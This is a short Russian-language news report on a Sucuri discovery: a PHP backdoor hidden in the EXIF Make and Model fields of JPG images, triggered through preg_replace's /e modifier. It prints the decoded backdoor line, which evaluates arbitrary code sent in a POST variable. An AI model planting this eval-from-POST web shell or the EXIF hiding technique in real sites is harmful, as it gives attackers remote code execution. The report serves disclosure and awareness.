Компания Sucuri обнаружила новый способ внедрения бэкдора на веб-сайт: код прячется в служебном поле EXIF изображения JPG. Это может
быть или новое изображение, которое пользователям разрешено добавлять на
сайт, например, в качестве своего аватара или другой фотографии на
форуме. Или это может быть измененная версия оригинального изображения.
На взломанном сайте был обнаружен на первый взгляд нормальный PHP-код, содержащий две функции PHP. Первая функция служит для
считывания служебных данных EXIF из файла JPG, а вторая функция
запускает программу.
Заголовок Make содержит параметр "/.*/e". В PHP-функции preg_replace параметр /e используется для исполнения передаваемого ему кода. В то же
время заголовок Model содержит непосредственно сам код.
Если расшифровать текст, закодированный в base64, то мы увидим следующее.
Code:
if (isset($_POST["zz1"])) {eval(stripslashes($_POST["zz1"]));}
То есть бэкдор готов запустить на исполнение любой контент, полученный в POST-запросе через переменную zzl.
По мнению исследователей, это довольно необычный способ прятать исполняемый код на сайте. Эдакий взлом с элементами стеганографии.
AtomX 2.8 Beta - Новая версия бесплатной CMS
AtomX 2.8 Beta - Новая версия бесплатной CMS
Программирование - что может быть проще.
Программирование - что может быть проще.
AtomX 2.8 Beta - Новая версия бесплатной CMS
AtomX 2.8 Beta - Новая версия бесплатной CMS
Написание простого вируса в блокноте
Что такое API и для чего они нужны
Классы в PHP для чайников
Написание простого вируса в блокноте